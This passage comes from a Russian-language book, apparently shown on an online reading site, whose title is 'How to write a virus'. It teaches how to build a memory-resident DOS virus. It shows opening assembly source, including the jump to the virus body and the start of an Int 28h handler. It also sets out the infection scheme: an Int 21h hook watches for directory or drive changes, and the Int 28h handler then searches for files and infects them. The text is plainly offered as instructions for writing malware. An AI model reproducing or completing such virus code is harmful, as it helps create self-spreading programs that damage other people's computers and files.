"Игорь Коваль. Как написать вирус" - читать интересную книгу автора

емах, реализованных в программе .
Итак, начнем :

prg segment
assume cs:prg,ds:prg,es:prg,ss:prg
org 100h

start: jmp vir ;Передача управ-
;ления вирусному
;коду ...
org 110h

Приведенные команды и директивы выполняют те же
самые функции, что и аналогичные, использованные
нами при создании нерезидентной вирусной програм-
мы .


2.5 Вирус начинает работу

Несколько забегая вперед, отметим, что наш вирус
будет работать так :

1. Обработчик прерывания Int 21h отслеживает
смену оператором текущего каталога или дис-
ка. Если пользователь действительно сменил
диск или каталог,то переменная TG_INFECT ус-
танавливается в единицу.
2. Обработчик прерывания Int 28h вызывается DOS
всякий раз, когда можно, не боясь зависаний,
обращаться к системным функциям, работающим
с файлами. Поэтому естественно возложить на
него задачу поиска и заражения файлов.Исходя
из этого процедура обработки Int 28h прове-
ряет значение TG_INFECT, и если оно равно
единице, выполняет поиск и заражение файлов.

--------------------------------------------------

После перехода на метку " vir " начинается испол-
нение вирусной программы .Поэтому продолжим :
( Собственно это и есть начало обработчика преры-
вания Int 28h )

vir: db 0ebh ;90h - Для рези-
db push_len ;90h дентной
; работы .

pushf ;Запишем флаги
;в стек ...